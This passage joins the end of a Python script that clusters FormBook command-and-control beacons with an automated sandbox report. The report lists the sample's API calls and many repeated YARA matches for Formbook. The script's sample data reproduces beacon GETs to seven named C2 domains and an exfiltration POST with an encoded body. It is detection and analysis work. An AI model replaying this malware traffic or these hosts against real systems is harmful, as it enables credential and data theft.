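        clusters.append({
            "path": path,
            "hosts": hosts,
            "methods": sorted({r.method for r in group}),
            "constant_params": constant,
            "varying_params": varying,
        })
    return clusters


# --- constructed sample traffic, modelled on the requests listed in the report ---
BUILD_TOKEN = "wR-h28Gxg"  # the o8= value, identical in every GET in the report
BEACONS = [  # (Host header, 4hq= value shortened to its first 32 characters)
    ("www.eufidelizo.com", "wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGX"),
    ("www.lyonfinancialusa.com", "I97X75yj3reE70KD0jnZLHprtk7Ny9G/"),
    ("www.afterdarksocial.club", "8TptbrIX6F4NxrWdTDNRTBReo0fMEuEL"),
    ("www.patrickguarte.com", "5p9Ov6C7qce51hIp6D8A72je8vUJddN7"),
    ("www.brennancorps.info", "P4ST2IJPckjMYpRf2FLdq0axEROKy7OO"),
    ("www.lopezmodeling.com", "dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp"),
    ("www.foxwhistle.com", "jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5"),
]


def _beacon_get(host: str, token: str) -> bytes:
    """Build a GET in the report's shape: no User-Agent, Connection: close, NUL tail."""
    req = (f"GET /henz/?4hq={token}&o8={BUILD_TOKEN} HTTP/1.1\r\n"
           f"Host: {host}\r\nConnection: close\r\n\r\n")
    return req.encode() + b"\x00" * 7


POST_RAW = (  # headers as listed in the report; body shortened, so Content-Length is omitted
    b"POST /henz/ HTTP/1.1\r\nHost: www.lyonfinancialusa.com\r\nConnection: close\r\n"
    b"Cache-Control: no-cache\r\nOrigin: http://www.lyonfinancialusa.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
    b"Referer: http://www.lyonfinancialusa.com/henz/\r\nAccept-Language: en-US\r\n"
    b"Accept-Encoding: gzip, deflate\r\n\r\n"
    b"4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0y"
    + b"\x00" * 8
)

SAMPLE_REQUESTS = [_beacon_get(h, t) for h, t in BEACONS] + [POST_RAW]


def analyze(raw_requests=SAMPLE_REQUESTS):
    """Parse the raw requests and return the beacon clusters found in them."""
    return find_beacon_clusters([parse_request(r) for r in raw_requests])


if __name__ == "__main__":
    for c in analyze():
        print(f"{c['path']} hit on {len(c['hosts'])} hosts via {c['methods']}; "
              f"constant={c['constant_params']} varying={c['varying_params']}")
```

On this report's traffic the one cluster returned is /henz/ across all seven hosts with GET and POST, o8 reported as constant and 4hq as varying. Keying on the path plus a shared parameter name rather than on any single host is the point: the hosts are mostly decoys and change per build, while the path and parameter names are what tie the beacons and the exfiltration POST together. Run against a larger capture, the same grouping separates a FormBook spray from ordinary browsing, where one path is rarely requested with the same parameter names against many unrelated domains.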
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard, 1_2_004050C0
Source: Lc8xQv8iZY.exe, 00000000.00000002.312089969.00000000006BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00404020 GetKeyboardState, 1_2_00404020
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405125

E-Banking Fraud

Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Lc8xQv8iZY.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00406333 0_2_00406333
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00404936 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_004168DD 1_2_004168DD
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040B504 1_2_0040B504
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040C24D 1_2_0040C24D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040BA00 1_2_0040BA00
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040BE18 1_2_0040BE18
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040C682 1_2_0040C682
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B80227 1_2_00B80227
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B804D1 1_2_00B804D1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004012B0 3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0042193D 3_2_0042193D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00421284 3_2_00421284
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004012A4 3_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040B453 3_2_0040B453
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040B457 3_2_0040B457
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00422429 3_2_00422429
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004044C7 3_2_004044C7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004044BE 3_2_004044BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004046E7 3_2_004046E7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040FE87 3_2_0040FE87
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B820A8 3_2_00B820A8
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB090 3_2_00ACB090
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B828EC 3_2_00B828EC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8E824 3_2_00B8E824
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71002 3_2_00B71002
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABF900 3_2_00ABF900
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B822AE 3_2_00B822AE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6FA2B 3_2_00B6FA2B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEEBB0 3_2_00AEEBB0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7DBD2 3_2_00B7DBD2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B703DA 3_2_00B703DA
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B82B28 3_2_00B82B28
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAB40 3_2_00ADAB40
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC841F 3_2_00AC841F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7D466 3_2_00B7D466
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACD5E0 3_2_00ACD5E0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B825DD 3_2_00B825DD
